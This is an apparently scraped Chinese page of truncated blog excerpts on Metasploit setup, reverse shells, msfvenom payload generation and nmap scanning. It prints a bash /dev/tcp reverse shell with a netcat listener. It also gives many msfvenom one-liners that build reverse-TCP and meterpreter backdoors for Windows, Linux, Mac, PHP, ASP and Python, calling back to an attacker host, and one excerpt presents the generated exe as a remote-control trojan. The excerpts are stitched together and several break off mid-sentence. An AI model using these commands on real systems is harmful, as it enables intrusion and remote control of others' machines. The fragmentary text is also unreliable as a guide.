msfvenom

[后渗透]Metasploit使用基础

两盒软妹~` 提交于 2019-12-06 03:05:17
0x00 简介 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 0x01 配置MSF的数据库 首先配置下MSF的数据库:可提升查询攻击模块的速度,以及利用速度 1.1 进入msf 查询数据库连接情况:发现默认情况下并未连接数据库 $msf> db_status 1.2 配置数据库 $service postgres enable $service postgres start $msfdb init 1.3 连接密码 看到上面的配置文件的提示,就可以通过文件地址,查看连接密码: $cat /usr/share/metasploit-framework/config/database.yml 1.4 查询 知道密码后,再次进入msf,通过db_connect 查询如何写连接的命令: 1.5 连接 再用用账号密码去连,最后 db

反弹shell学习总结

寵の児 提交于 2019-12-04 15:17:12
0x00 反弹shell概述   反弹shell:即reverse shell,在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,通过反弹的shell去远程控制服务器。 0x01 反弹shell原因   通常由于防火墙、权限不足、端口占用等情况下,无法直接连接目标主机,此时就需要通过反弹shell,让目标主机主动来连接我们再公网的vps。 0x02 Linux下反弹shell   实验环境:   攻击主机:kali:192.168.217.135   目标主机:ubuntu:192.168.217.132   1.Bash反弹   1)攻击主机上执行监听:       nc -lvp port  //设定监听的端口        2)目标主机上反弹shell:        bash -i >& /dev/tcp/x.x.x.x/port 0>&1      //bash -i:打开一个交互的bash    //>&:将标准输出和标准错误输出重定向到文件/dev/tcp/,即传递到远程    ///dev/tcp/x.x.x.x/port:调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口    //0>&1:标准输入重定向到标准输出,实现与反弹出来的shell的交互     Linux文件描述符:   

Msfvenom命令总结大全

匿名 (未验证) 提交于 2019-12-03 00:13:02
Msfvenom命令 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 查看所有payload encoder nops。 输出文件格式。 (- -help-formats 列出所有文件格式) Executable formats: asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war Transform formats: bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Msf小结

匿名 (未验证) 提交于 2019-12-02 23:55:01
Msfvenom是有效负载生成和编码的组合。 1 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<your port to connect on> -e -f elf -a x86 --platform linux -o shell 1 msfvenom -p windows/shell_reverse_tcp LHOST=<your IP Address> LPORT=<your port to connect on> -b "\x00\x0a\x0d" -a x86 --platform win -f c 1 msfvenom -p cmd/unix/reverse_python LHOST=<your IP Address> LPORT=<your port to connect on> -o shell.py 1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp 1 msfvenom -p cmd/unix/reverse_bash LHOST=

使用kali生成远控payload

一个人想着一个人 提交于 2019-12-02 17:23:25
  kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程   生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马   即:  Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe  给出的例子里面没有写端口号,我们修改一点成为下面这个:  msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe  LHOST就是你kali的ip地址,LPORT就是想要让kali监听用哪一个端口来监听这个shell,然后将这个生成的exe文件输出到当前目录下Cl0ud.exe  我这里kali是内网地址:10.10.10.128,监听端口是1234

msf下的各种生成payload命令

≯℡__Kan透↙ 提交于 2019-12-02 06:18:46
msf下的各种生成payload命令 List payloads msfvenom -l Binaries: Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho Web Payloads PHP msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php

网站提权之MSF骚操作

对着背影说爱祢 提交于 2019-12-01 13:47:36
当我们在进行web渗透测试的时候,拿到了webshell,但是在执行net user、whoami、类似的命令会发现怎么好像用不了,没有回显,权限不够,这可怎么办呐? 测试环境: 内网,没钱买服务器,而且还拿不到站,尴尬的事情😭 攻击者:parrotos 这个系统跟kali差不多 服务器:windows2003 那么,我们现在先来看看 使用msfvenom如何生成payload msfvenom 这个是一个什么东西就不用说了吧,玩过metasploit的都知道(表示我还是一个新手!!!),当然没玩过的自行谷歌,已经很多大佬跟我说过这个是渗透测试最基本的东西 在freebuf上面看到msfvenom命令行选项的中文翻译,我直接搬过来了,不犯法吧,哈哈哈!!! msfvenom命令行选项 Options: 12345678910111213141516171819 -p, --payload <payload> 指定需要使用的payload(攻击载荷)。如果需要使用自定义的payload,请使用'-'或者stdin指定-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, --nopsled <length> 为payload预先指定一个NOP滑动长度-f, --format

渗透测试工具

微笑、不失礼 提交于 2019-11-29 20:53:34
最好的 NMAP 扫描策略 # 适用所有大小网络最好的 nmap 扫描策略 # 主机发现,生成存活主机列表 $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # 端口发现,发现大部分常用端口 # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # 端口发现,发现全部端口,但 UDP 端口的扫描会非常慢 $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # 显示 TCP\UDP 端口 $ grep "open"